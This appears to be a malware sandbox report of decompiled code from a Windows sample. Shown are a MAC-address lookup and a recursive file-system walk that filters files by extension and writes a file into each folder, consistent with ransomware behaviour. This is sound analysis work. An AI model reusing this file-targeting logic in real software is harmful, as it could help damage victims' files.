                                                                                                    						__imp__GetAdaptersInfo(_t41, _t15);
                                                                                                    						__eflags = _t15;
                                                                                                    						if(_t15 == 0) {
                                                                                                    							_push( *(_t41 + 0x199) & 0x000000ff);
                                                                                                    							_push( *(_t41 + 0x198) & 0x000000ff);
                                                                                                    							_push( *(_t41 + 0x197) & 0x000000ff);
                                                                                                    							_push( *(_t41 + 0x196) & 0x000000ff);
                                                                                                    							_push( *(_t41 + 0x195) & 0x000000ff);
                                                                                                    							E004204A6(_t37, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t41 + 0x194) & 0x000000ff);
                                                                                                    							_push(_t37);
                                                                                                    							_t11 = _t41 + 0x1b0; // 0x1b0
                                                                                                    							_push("Address: %s, mac: %s\n");
                                                                                                    							E00421F2D(_t33, _t37, _t41, __eflags);
                                                                                                    							_push("\n");
                                                                                                    							E00421F2D(_t33, _t37, _t41, __eflags);
                                                                                                    							_t45 = _t45 + 0x30;
                                                                                                    						}
                                                                                                    						E00420BED(_t41);
                                                                                                    						return _t37;
                                                                                                    					} else {
                                                                                                    						E00420BED(_t41);
                                                                                                    						_t41 = E00420C62(_t33, _t35, _t37, _v8);
                                                                                                    						_t45 = _t45 + 8;
                                                                                                    						__eflags = _t41;
                                                                                                    						if(__eflags == 0) {
                                                                                                    							goto L1;
                                                                                                    						} else {
                                                                                                    							goto L4;
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					L1:
                                                                                                    					_push("Error allocating memory needed to call GetAdaptersinfo\n");
                                                                                                    					E00421F2D(_t33, _t37, _t41, _t49);
                                                                                                    					E00420BED(_t37);
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    			}















                                                                                                    0x0040e670
                                                                                                    0x0040e675
                                                                                                    0x0040e678
                                                                                                    0x0040e689
                                                                                                    0x0040e690
                                                                                                    0x0040e692
                                                                                                    0x0040e695
                                                                                                    0x0040e697
                                                                                                    0x0040e6b4
                                                                                                    0x0040e6b9
                                                                                                    0x0040e6bf
                                                                                                    0x0040e6c2
                                                                                                    0x0040e6db
                                                                                                    0x0040e6db
                                                                                                    0x0040e6e0
                                                                                                    0x0040e6e6
                                                                                                    0x0040e6e8
                                                                                                    0x0040e6f1
                                                                                                    0x0040e6f9
                                                                                                    0x0040e701
                                                                                                    0x0040e709
                                                                                                    0x0040e711
                                                                                                    0x0040e720
                                                                                                    0x0040e725
                                                                                                    0x0040e726
                                                                                                    0x0040e72d
                                                                                                    0x0040e732
                                                                                                    0x0040e737
                                                                                                    0x0040e73c
                                                                                                    0x0040e741
                                                                                                    0x0040e741
                                                                                                    0x0040e745
                                                                                                    0x0040e754
                                                                                                    0x0040e6c4
                                                                                                    0x0040e6c5
                                                                                                    0x0040e6d2
                                                                                                    0x0040e6d4
                                                                                                    0x0040e6d7
                                                                                                    0x0040e6d9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040e6d9
                                                                                                    0x0040e699
                                                                                                    0x0040e699
                                                                                                    0x0040e699
                                                                                                    0x0040e69e
                                                                                                    0x0040e6a4
                                                                                                    0x0040e6b3
                                                                                                    0x0040e6b3

                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 0040E67F
                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00540000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                    • _malloc.LIBCMT ref: 0040E68B
                                                                                                    • _wprintf.LIBCMT ref: 0040E69E
                                                                                                    • _free.LIBCMT ref: 0040E6A4
                                                                                                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                    • _free.LIBCMT ref: 0040E6C5
                                                                                                    • _malloc.LIBCMT ref: 0040E6CD
                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                    • _sprintf.LIBCMT ref: 0040E720
                                                                                                    • _wprintf.LIBCMT ref: 0040E732
                                                                                                    • _wprintf.LIBCMT ref: 0040E73C
                                                                                                    • _free.LIBCMT ref: 0040E745
                                                                                                    Strings
                                                                                                    • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                    • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                    • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                    • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                    • API String ID: 3901070236-1604013687
                                                                                                    • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                                    • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                    • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                                    • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 75%
                                                                                                    			E00410160(intOrPtr __ecx, intOrPtr* __edx, char _a4, intOrPtr _a24, intOrPtr _a28) {
                                                                                                    				signed int _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				signed int _v20;
                                                                                                    				signed int _v24;
                                                                                                    				char _v40;
                                                                                                    				signed int _v44;
                                                                                                    				signed int _v48;
                                                                                                    				signed int _v64;
                                                                                                    				intOrPtr _v68;
                                                                                                    				intOrPtr _v72;
                                                                                                    				signed int _v76;
                                                                                                    				signed int _v80;
                                                                                                    				char _v96;
                                                                                                    				signed int _v100;
                                                                                                    				signed int _v104;
                                                                                                    				WCHAR* _v108;
                                                                                                    				short _v120;
                                                                                                    				signed int _v124;
                                                                                                    				signed int _v128;
                                                                                                    				char _v144;
                                                                                                    				intOrPtr* _v148;
                                                                                                    				struct _WIN32_FIND_DATAW _v740;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				intOrPtr _t270;
                                                                                                    				intOrPtr _t280;
                                                                                                    				WCHAR* _t288;
                                                                                                    				short _t291;
                                                                                                    				signed int _t293;
                                                                                                    				signed int _t294;
                                                                                                    				signed int _t298;
                                                                                                    				signed int _t299;
                                                                                                    				intOrPtr _t303;
                                                                                                    				WCHAR* _t308;
                                                                                                    				void* _t309;
                                                                                                    				void* _t313;
                                                                                                    				void* _t330;
                                                                                                    				signed int _t334;
                                                                                                    				WCHAR* _t335;
                                                                                                    				WCHAR* _t346;
                                                                                                    				WCHAR* _t348;
                                                                                                    				void* _t405;
                                                                                                    				void* _t411;
                                                                                                    				intOrPtr _t413;
                                                                                                    				intOrPtr _t414;
                                                                                                    				void* _t415;
                                                                                                    				intOrPtr* _t418;
                                                                                                    				signed int _t420;
                                                                                                    				intOrPtr* _t423;
                                                                                                    				signed int _t425;
                                                                                                    				char* _t431;
                                                                                                    				char* _t432;
                                                                                                    				intOrPtr* _t434;
                                                                                                    				signed int _t436;
                                                                                                    				intOrPtr* _t439;
                                                                                                    				intOrPtr* _t441;
                                                                                                    				short* _t445;
                                                                                                    				short* _t447;
                                                                                                    				signed int _t450;
                                                                                                    				signed int _t453;
                                                                                                    				WCHAR* _t454;
                                                                                                    				short* _t455;
                                                                                                    				signed int _t460;
                                                                                                    				intOrPtr* _t468;
                                                                                                    				void* _t470;
                                                                                                    				void* _t471;
                                                                                                    				void* _t472;
                                                                                                    				intOrPtr _t475;
                                                                                                    				intOrPtr _t476;
                                                                                                    				signed int _t477;
                                                                                                    				signed int _t480;
                                                                                                    				void* _t481;
                                                                                                    				void* _t482;
                                                                                                    				WCHAR* _t484;
                                                                                                    				intOrPtr _t490;
                                                                                                    				signed int* _t491;
                                                                                                    				void* _t492;
                                                                                                    				WCHAR* _t494;
                                                                                                    				short _t495;
                                                                                                    				intOrPtr _t496;
                                                                                                    				void* _t497;
                                                                                                    				void* _t498;
                                                                                                    				short* _t501;
                                                                                                    				short* _t502;
                                                                                                    				void* _t503;
                                                                                                    				short* _t504;
                                                                                                    
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4cab68);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t496;
                                                                                                    				_t497 = _t496 - 0x2d4;
                                                                                                    				_t410 = __edx;
                                                                                                    				_v72 = __ecx;
                                                                                                    				_v148 = __edx;
                                                                                                    				_v8 = 0;
                                                                                                    				E00411AB0();
                                                                                                    				_t480 = 0;
                                                                                                    				_t490 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
                                                                                                    				_v68 = _t490;
                                                                                                    				if(_t490 == 0) {
                                                                                                    					L15:
                                                                                                    					_v76 = 7;
                                                                                                    					_v80 = 0;
                                                                                                    					_v96 = 0;
                                                                                                    					_v8 = 3;
                                                                                                    					_push(0xffffffff);
                                                                                                    					_v44 = 7;
                                                                                                    					 *((intOrPtr*)(_v72 + 0x8bc)) = 1;
                                                                                                    					_v64 = 0;
                                                                                                    					_v48 = 0;
                                                                                                    					E00414690(_t410,  &_v64,  &_a4, 0);
                                                                                                    					_v8 = 4;
                                                                                                    					_t411 = PathFindFileNameW;
                                                                                                    					_t267 =  >=  ? _v64 :  &_v64;
                                                                                                    					_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
                                                                                                    					_v20 = 7;
                                                                                                    					_v24 = 0;
                                                                                                    					_v40 = 0;
                                                                                                    					if( *_t468 != 0) {
                                                                                                    						_t418 = _t468;
                                                                                                    						_t79 = _t418 + 2; // 0x2
                                                                                                    						_t490 = _t79;
                                                                                                    						do {
                                                                                                    							_t270 =  *_t418;
                                                                                                    							_t418 = _t418 + 2;
                                                                                                    						} while (_t270 != 0);
                                                                                                    						_t420 = _t418 - _t490 >> 1;
                                                                                                    						L24:
                                                                                                    						_push(_t420);
                                                                                                    						E00415C10(_t411,  &_v40, _t480, _t490, _t468);
                                                                                                    						_v8 = 5;
                                                                                                    						_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
                                                                                                    						if( &_v64 != _t491) {
                                                                                                    							if(_v44 >= 8) {
                                                                                                    								L00422587(_v64);
                                                                                                    								_t497 = _t497 + 4;
                                                                                                    							}
                                                                                                    							_v44 = 7;
                                                                                                    							_v48 = 0;
                                                                                                    							_v64 = 0;
                                                                                                    							if(_t491[5] >= 8) {
                                                                                                    								_v64 =  *_t491;
                                                                                                    								 *_t491 = 0;
                                                                                                    							} else {
                                                                                                    								_t384 = _t491[4] + 1;
                                                                                                    								if(_t491[4] + 1 != 0) {
                                                                                                    									E004205A0( &_v64, _t491, _t384 + _t384);
                                                                                                    									_t497 = _t497 + 0xc;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							_v48 = _t491[4];
                                                                                                    							_v44 = _t491[5];
                                                                                                    							_t491[5] = 7;
                                                                                                    							_t491[4] = 0;
                                                                                                    							 *_t491 = 0;
                                                                                                    						}
                                                                                                    						if(_v124 >= 8) {
                                                                                                    							L00422587(_v144);
                                                                                                    							_t497 = _t497 + 4;
                                                                                                    						}
                                                                                                    						_t481 = 0;
                                                                                                    						while(_v48 != 0 || _v24 != 0) {
                                                                                                    							_t481 = _t481 + 1;
                                                                                                    							_t278 =  >=  ? _v64 :  &_v64;
                                                                                                    							_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
                                                                                                    							if( *_t468 != 0) {
                                                                                                    								_t423 = _t468;
                                                                                                    								_t109 = _t423 + 2; // 0x2
                                                                                                    								_t491 = _t109;
                                                                                                    								do {
                                                                                                    									_t280 =  *_t423;
                                                                                                    									_t423 = _t423 + 2;
                                                                                                    								} while (_t280 != 0);
                                                                                                    								_t425 = _t423 - _t491 >> 1;
                                                                                                    								L42:
                                                                                                    								_push(_t425);
                                                                                                    								E00415C10(_t411,  &_v40, _t481, _t491, _t468);
                                                                                                    								_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
                                                                                                    								if( &_v64 != _t491) {
                                                                                                    									if(_v44 >= 8) {
                                                                                                    										L00422587(_v64);
                                                                                                    										_t497 = _t497 + 4;
                                                                                                    									}
                                                                                                    									_v44 = 7;
                                                                                                    									_v48 = 0;
                                                                                                    									_v64 = 0;
                                                                                                    									if(_t491[5] >= 8) {
                                                                                                    										_v64 =  *_t491;
                                                                                                    										 *_t491 = 0;
                                                                                                    									} else {
                                                                                                    										_t372 = _t491[4] + 1;
                                                                                                    										if(_t491[4] + 1 != 0) {
                                                                                                    											E004205A0( &_v64, _t491, _t372 + _t372);
                                                                                                    											_t497 = _t497 + 0xc;
                                                                                                    										}
                                                                                                    									}
                                                                                                    									_v48 = _t491[4];
                                                                                                    									_v44 = _t491[5];
                                                                                                    									_t491[5] = 7;
                                                                                                    									_t491[4] = 0;
                                                                                                    									 *_t491 = 0;
                                                                                                    								}
                                                                                                    								if(_v124 >= 8) {
                                                                                                    									L00422587(_v144);
                                                                                                    									_t497 = _t497 + 4;
                                                                                                    								}
                                                                                                    								continue;
                                                                                                    							}
                                                                                                    							_t425 = 0;
                                                                                                    							goto L42;
                                                                                                    						}
                                                                                                    						if(_t481 > 3) {
                                                                                                    							L73:
                                                                                                    							if(_v20 >= 8) {
                                                                                                    								L00422587(_v40);
                                                                                                    								_t497 = _t497 + 4;
                                                                                                    							}
                                                                                                    							_v8 = 3;
                                                                                                    							_v20 = 7;
                                                                                                    							_v24 = 0;
                                                                                                    							_v40 = 0;
                                                                                                    							if(_v44 >= 8) {
                                                                                                    								L00422587(_v64);
                                                                                                    								_t497 = _t497 + 4;
                                                                                                    							}
                                                                                                    							_t288 = E00417140( &_v144,  &_a4, "*");
                                                                                                    							_t498 = _t497 + 4;
                                                                                                    							if(_t288[0xa] >= 8) {
                                                                                                    								_t288 =  *_t288;
                                                                                                    							}
                                                                                                    							_t482 = FindFirstFileW(_t288,  &_v740);
                                                                                                    							if(_v124 >= 8) {
                                                                                                    								L00422587(_v144);
                                                                                                    								_t498 = _t498 + 4;
                                                                                                    							}
                                                                                                    							_v124 = 7;
                                                                                                    							_t492 = 0;
                                                                                                    							_v128 = 0;
                                                                                                    							_v144 = 0;
                                                                                                    							if(_t482 == 0xffffffff) {
                                                                                                    								L119:
                                                                                                    								if(_v76 >= 8) {
                                                                                                    									L00422587(_v96);
                                                                                                    									_t498 = _t498 + 4;
                                                                                                    								}
                                                                                                    								_t291 = 0;
                                                                                                    								_v76 = 7;
                                                                                                    								_v80 = 0;
                                                                                                    								_v96 = 0;
                                                                                                    								goto L122;
                                                                                                    							} else {
                                                                                                    								_t413 = _a28;
                                                                                                    								do {
                                                                                                    									_t431 = ".";
                                                                                                    									_t293 =  &(_v740.cFileName);
                                                                                                    									while(1) {
                                                                                                    										_t470 =  *_t293;
                                                                                                    										if(_t470 !=  *_t431) {
                                                                                                    											break;
                                                                                                    										}
                                                                                                    										if(_t470 == 0) {
                                                                                                    											L88:
                                                                                                    											_t294 = 0;
                                                                                                    											L90:
                                                                                                    											if(_t294 == 0) {
                                                                                                    												goto L117;
                                                                                                    											}
                                                                                                    											_t432 = L"..";
                                                                                                    											_t298 =  &(_v740.cFileName);
                                                                                                    											while(1) {
                                                                                                    												_t471 =  *_t298;
                                                                                                    												if(_t471 !=  *_t432) {
                                                                                                    													break;
                                                                                                    												}
                                                                                                    												if(_t471 == 0) {
                                                                                                    													L96:
                                                                                                    													_t299 = 0;
                                                                                                    													L98:
                                                                                                    													if(_t299 == 0) {
                                                                                                    														goto L117;
                                                                                                    													}
                                                                                                    													if((_v740.dwFileAttributes & 0x00000010) == 0) {
                                                                                                    														_t492 = _t492 + 1;
                                                                                                    														if(_t492 >= 0x400) {
                                                                                                    															_t492 = 0;
                                                                                                    															E00411AB0();
                                                                                                    														}
                                                                                                    														_v20 = 7;
                                                                                                    														_push(0xffffffff);
                                                                                                    														_v40 = 0;
                                                                                                    														_v24 = 0;
                                                                                                    														E00414690(_t413,  &_v40,  &_a4, 0);
                                                                                                    														_v8 = 9;
                                                                                                    														if(_v740.cFileName != 0) {
                                                                                                    															_t434 =  &(_v740.cFileName);
                                                                                                    															_t231 = _t434 + 2; // 0x2
                                                                                                    															_t472 = _t231;
                                                                                                    															do {
                                                                                                    																_t303 =  *_t434;
                                                                                                    																_t434 = _t434 + 2;
                                                                                                    															} while (_t303 != 0);
                                                                                                    															_t436 = _t434 - _t472 >> 1;
                                                                                                    															goto L108;
                                                                                                    														} else {
                                                                                                    															_t436 = 0;
                                                                                                    															L108:
                                                                                                    															_push(_t436);
                                                                                                    															E00415AE0(_t413,  &_v40, _t482, _t492,  &(_v740.cFileName));
                                                                                                    															_t307 =  >=  ? _v40 :  &_v40;
                                                                                                    															_t308 = PathFindExtensionW( >=  ? _v40 :  &_v40);
                                                                                                    															_t439 = _v72 + 0x868;
                                                                                                    															if( *((intOrPtr*)(_t439 + 0x14)) >= 8) {
                                                                                                    																_t439 =  *_t439;
                                                                                                    															}
                                                                                                    															_push(_t308);
                                                                                                    															_push(_t439);
                                                                                                    															_t309 = E00421C02(_t439);
                                                                                                    															_t498 = _t498 + 8;
                                                                                                    															if(_t309 == 0) {
                                                                                                    																_t441 = _v72 + 0x820;
                                                                                                    																if( *((intOrPtr*)(_t441 + 0x14)) >= 8) {
                                                                                                    																	_t441 =  *_t441;
                                                                                                    																}
                                                                                                    																_push(_t441);
                                                                                                    																_t312 =  >=  ? _v40 :  &_v40;
                                                                                                    																_push( >=  ? _v40 :  &_v40);
                                                                                                    																_t313 = E00421C02(_t441);
                                                                                                    																_t498 = _t498 + 8;
                                                                                                    																if(_t313 == 0) {
                                                                                                    																	E004136C0(_t413,  &_v40);
                                                                                                    																}
                                                                                                    															}
                                                                                                    															L115:
                                                                                                    															_v8 = 3;
                                                                                                    															if(_v20 >= 8) {
                                                                                                    																L00422587(_v40);
                                                                                                    																_t498 = _t498 + 4;
                                                                                                    															}
                                                                                                    															goto L117;
                                                                                                    														}
                                                                                                    													}
                                                                                                    													E00417140( &_v40,  &_a4,  &(_v740.cFileName));
                                                                                                    													_push(1);
                                                                                                    													_v8 = 8;
                                                                                                    													E00415AE0(_t413,  &_v40, _t482, _t492, "\\");
                                                                                                    													_push(_t413);
                                                                                                    													_t501 = _t498 + 4 - 0x18;
                                                                                                    													_t445 = _t501;
                                                                                                    													_push(0xffffffff);
                                                                                                    													 *(_t445 + 0x14) = 7;
                                                                                                    													 *(_t445 + 0x10) = 0;
                                                                                                    													 *_t445 = 0;
                                                                                                    													E00414690(_t413, _t445,  &_v40, 0);
                                                                                                    													E00410160(_v72, _v148);
                                                                                                    													_t498 = _t501 + 0x1c;
                                                                                                    													goto L115;
                                                                                                    												}
                                                                                                    												_t475 =  *((intOrPtr*)(_t298 + 2));
                                                                                                    												_t209 =  &(_t432[2]); // 0x2e
                                                                                                    												if(_t475 !=  *_t209) {
                                                                                                    													break;
                                                                                                    												}
                                                                                                    												_t298 = _t298 + 4;
                                                                                                    												_t432 =  &(_t432[4]);
                                                                                                    												if(_t475 != 0) {
                                                                                                    													continue;
                                                                                                    												}
                                                                                                    												goto L96;
                                                                                                    											}
                                                                                                    											asm("sbb eax, eax");
                                                                                                    											_t299 = _t298 | 0x00000001;
                                                                                                    											goto L98;
                                                                                                    										}
                                                                                                    										_t476 =  *((intOrPtr*)(_t293 + 2));
                                                                                                    										_t206 =  &(_t431[2]); // 0x2e0000
                                                                                                    										if(_t476 !=  *_t206) {
                                                                                                    											break;
                                                                                                    										}
                                                                                                    										_t293 = _t293 + 4;
                                                                                                    										_t431 =  &(_t431[4]);
                                                                                                    										if(_t476 != 0) {
                                                                                                    											continue;
                                                                                                    										}
                                                                                                    										goto L88;
                                                                                                    									}
                                                                                                    									asm("sbb eax, eax");
                                                                                                    									_t294 = _t293 | 0x00000001;
                                                                                                    									goto L90;
                                                                                                    									L117:
                                                                                                    								} while (FindNextFileW(_t482,  &_v740) != 0);
                                                                                                    								FindClose(_t482);
                                                                                                    								goto L119;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t502 = _t497 - 0x18;
                                                                                                    						_t447 = _t502;
                                                                                                    						_push(0xffffffff);
                                                                                                    						 *(_t447 + 0x14) = 7;
                                                                                                    						 *(_t447 + 0x10) = 0;
                                                                                                    						 *_t447 = 0;
                                                                                                    						E00414690(_t411, _t447,  &_a4, 0);
                                                                                                    						_t330 = E0040F310(_t481, _t491);
                                                                                                    						_t497 = _t502 + 0x18;
                                                                                                    						if(_t330 != 0) {
                                                                                                    							goto L73;
                                                                                                    						}
                                                                                                    						_push(0xffffffff);
                                                                                                    						E00414690(_t411,  &_v96,  &_a4, 0);
                                                                                                    						E00413A90(_t411,  &_v108, _t481, 0x400);
                                                                                                    						_v8 = 6;
                                                                                                    						_t450 = 0;
                                                                                                    						_t334 = _v80;
                                                                                                    						_t494 = _v108;
                                                                                                    						if(_t334 == 0) {
                                                                                                    							L57:
                                                                                                    							_t414 = _v72;
                                                                                                    							 *((short*)(_t494 + 2 + _t334 * 2)) = 0;
                                                                                                    							_t335 = _t414 + 0x820;
                                                                                                    							if(_t335[0xa] >= 8) {
                                                                                                    								_t335 =  *_t335;
                                                                                                    							}
                                                                                                    							PathAppendW(_t494, _t335);
                                                                                                    							_push(_v68);
                                                                                                    							_v124 = 7;
                                                                                                    							_v128 = 0;
                                                                                                    							_v144 = 0;
                                                                                                    							E00418400( &_v144, _t494, _v104);
                                                                                                    							if(_v76 >= 8) {
                                                                                                    								L00422587(_v96);
                                                                                                    								_t497 = _t497 + 4;
                                                                                                    							}
                                                                                                    							_t453 = _v124;
                                                                                                    							_v76 = 7;
                                                                                                    							_v80 = 0;
                                                                                                    							_v96 = 0;
                                                                                                    							if(_t453 >= 8) {
                                                                                                    								_v96 = _v144;
                                                                                                    							} else {
                                                                                                    								_t356 = _v128 + 1;
                                                                                                    								if(_v128 + 1 != 0) {
                                                                                                    									E004205A0( &_v96,  &_v144, _t356 + _t356);
                                                                                                    									_t453 = _v124;
                                                                                                    									_t497 = _t497 + 0xc;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							_v80 = _v128;
                                                                                                    							_t343 =  >=  ? _v96 :  &_v96;
                                                                                                    							_v76 = _t453;
                                                                                                    							if(PathFileExistsW( >=  ? _v96 :  &_v96) == 0) {
                                                                                                    								_t346 = E00420C62(_t414, _t468, _t481, 0x7d00);
                                                                                                    								_t454 = _t414 + 0x838;
                                                                                                    								_t503 = _t497 + 4;
                                                                                                    								_t484 = _t346;
                                                                                                    								if(_t454[0xa] >= 8) {
                                                                                                    									_t454 =  *_t454;
                                                                                                    								}
                                                                                                    								lstrcpyW(_t484, _t454);
                                                                                                    								_t348 = _t414 + 0x850;
                                                                                                    								if( *((intOrPtr*)(_t414 + 0x864)) >= 8) {
                                                                                                    									_t348 =  *_t348;
                                                                                                    								}
                                                                                                    								lstrcatW(_t484, _t348);
                                                                                                    								_t504 = _t503 - 0x18;
                                                                                                    								_t455 = _t504;
                                                                                                    								_push(0xffffffff);
                                                                                                    								 *(_t455 + 0x14) = 7;
                                                                                                    								 *(_t455 + 0x10) = 0;
                                                                                                    								 *_t455 = 0;
                                                                                                    								E00414690(_t414, _t455,  &_v96, 0);
                                                                                                    								E0040F0E0(_t484);
                                                                                                    								E00420BED(_t484);
                                                                                                    								_t497 = _t504 + 0x1c;
                                                                                                    							}
                                                                                                    							if(_t494 != 0) {
                                                                                                    								L00422587(_t494);
                                                                                                    								_t497 = _t497 + 4;
                                                                                                    							}
                                                                                                    							goto L73;
                                                                                                    						}
                                                                                                    						do {
                                                                                                    							_t363 =  >=  ? _v96 :  &_v96;
                                                                                                    							_t494[_t450] = ( >=  ? _v96 :  &_v96)[_t450];
                                                                                                    							_t450 = _t450 + 1;
                                                                                                    							_t334 = _v80;
                                                                                                    						} while (_t450 < _t334);
                                                                                                    						goto L57;
                                                                                                    					}
                                                                                                    					_t420 = 0;
                                                                                                    					goto L24;
                                                                                                    				} else {
                                                                                                    					_t415 = 0;
                                                                                                    					do {
                                                                                                    						_v20 = 7;
                                                                                                    						_push(0xffffffff);
                                                                                                    						_v40 = 0;
                                                                                                    						_v24 = 0;
                                                                                                    						E00414690(_t415,  &_v40,  &_a4, 0);
                                                                                                    						_v8 = 1;
                                                                                                    						_push(0xffffffff);
                                                                                                    						_v120 = 0;
                                                                                                    						_v100 = 7;
                                                                                                    						_v104 = 0;
                                                                                                    						E00414690(_t415,  &_v120,  *_v148 + _t415, 0);
                                                                                                    						_v8 = 2;
                                                                                                    						_t477 = _v24;
                                                                                                    						if(_t477 <= 1) {
                                                                                                    							L10:
                                                                                                    							if(_v100 >= 8) {
                                                                                                    								L00422587(_v120);
                                                                                                    								_t497 = _t497 + 4;
                                                                                                    							}
                                                                                                    							_v100 = 7;
                                                                                                    							_v8 = 0;
                                                                                                    							_v104 = 0;
                                                                                                    							_v120 = 0;
                                                                                                    							if(_v20 >= 8) {
                                                                                                    								L00422587(_v40);
                                                                                                    								_t497 = _t497 + 4;
                                                                                                    							}
                                                                                                    							goto L14;
                                                                                                    						}
                                                                                                    						_t460 = _v104;
                                                                                                    						if(_t460 <= 1) {
                                                                                                    							goto L10;
                                                                                                    						} else {
                                                                                                    							_t400 =  >=  ? _v40 :  &_v40;
                                                                                                    							if( *((short*)(( >=  ? _v40 :  &_v40) + _t477 * 2 - 2)) != 0x5c) {
                                                                                                    								_push(1);
                                                                                                    								E00415AE0(_t415,  &_v40, _t480, _t490, "\\");
                                                                                                    								_t460 = _v104;
                                                                                                    							}
                                                                                                    							_t495 = _v120;
                                                                                                    							_t402 =  >=  ? _t495 :  &_v120;
                                                                                                    							if( *((short*)(( >=  ? _t495 :  &_v120) + _t460 * 2 - 2)) != 0x5c) {
                                                                                                    								_push(1);
                                                                                                    								E00415AE0(_t415,  &_v120, _t480, _t495, "\\");
                                                                                                    								_t495 = _v120;
                                                                                                    							}
                                                                                                    							_t462 =  >=  ? _t495 :  &_v120;
                                                                                                    							_t404 =  >=  ? _v40 :  &_v40;
                                                                                                    							_t405 = E00420235(_t415, _t480, _t495,  >=  ? _v40 :  &_v40,  >=  ? _t495 :  &_v120);
                                                                                                    							_t498 = _t497 + 8;
                                                                                                    							if(_t405 == 0) {
                                                                                                    								if(_v100 >= 8) {
                                                                                                    									L00422587(_v120);
                                                                                                    									_t498 = _t498 + 4;
                                                                                                    								}
                                                                                                    								_t291 = 0;
                                                                                                    								_v100 = 7;
                                                                                                    								_v104 = 0;
                                                                                                    								_v120 = 0;
                                                                                                    								if(_v20 >= 8) {
                                                                                                    									_t291 = L00422587(_v40);
                                                                                                    									_t498 = _t498 + 4;
                                                                                                    								}
                                                                                                    								L122:
                                                                                                    								if(_a24 >= 8) {
                                                                                                    									_t291 = L00422587(_a4);
                                                                                                    								}
                                                                                                    								 *[fs:0x0] = _v16;
                                                                                                    								return _t291;
                                                                                                    							} else {
                                                                                                    								_t490 = _v68;
                                                                                                    								goto L10;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						L14:
                                                                                                    						_t480 = _t480 + 1;
                                                                                                    						_t415 = _t415 + 0x18;
                                                                                                    					} while (_t480 < _t490);
                                                                                                    					goto L15;
                                                                                                    				}
                                                                                                    			}



























































































                                                                                                    0x00410163
                                                                                                    0x00410165
                                                                                                    0x00410170
                                                                                                    0x00410171
                                                                                                    0x00410178
                                                                                                    0x00410180
                                                                                                    0x00410182
                                                                                                    0x00410186
                                                                                                    0x0041018c
                                                                                                    0x00410193
                                                                                                    0x004101a2
                                                                                                    0x004101b1
                                                                                                    0x004101b3
                                                                                                    0x004101b6
                                                                                                    0x004102e8
                                                                                                    0x004102ea
                                                                                                    0x004102f1
                                                                                                    0x004102f8
                                                                                                    0x00410302
                                                                                                    0x00410306
                                                                                                    0x00410308
                                                                                                    0x0041030f
                                                                                                    0x0041031c
                                                                                                    0x00410324
                                                                                                    0x0041032b
                                                                                                    0x00410330
                                                                                                    0x0041033b
                                                                                                    0x00410341
                                                                                                    0x00410348
                                                                                                    0x0041034a
                                                                                                    0x00410353
                                                                                                    0x0041035a
                                                                                                    0x00410361
                                                                                                    0x004103a6
                                                                                                    0x004103a8
                                                                                                    0x004103a8
                                                                                                    0x004103b0
                                                                                                    0x004103b0
                                                                                                    0x004103b3
                                                                                                    0x004103b6
                                                                                                    0x004103bd
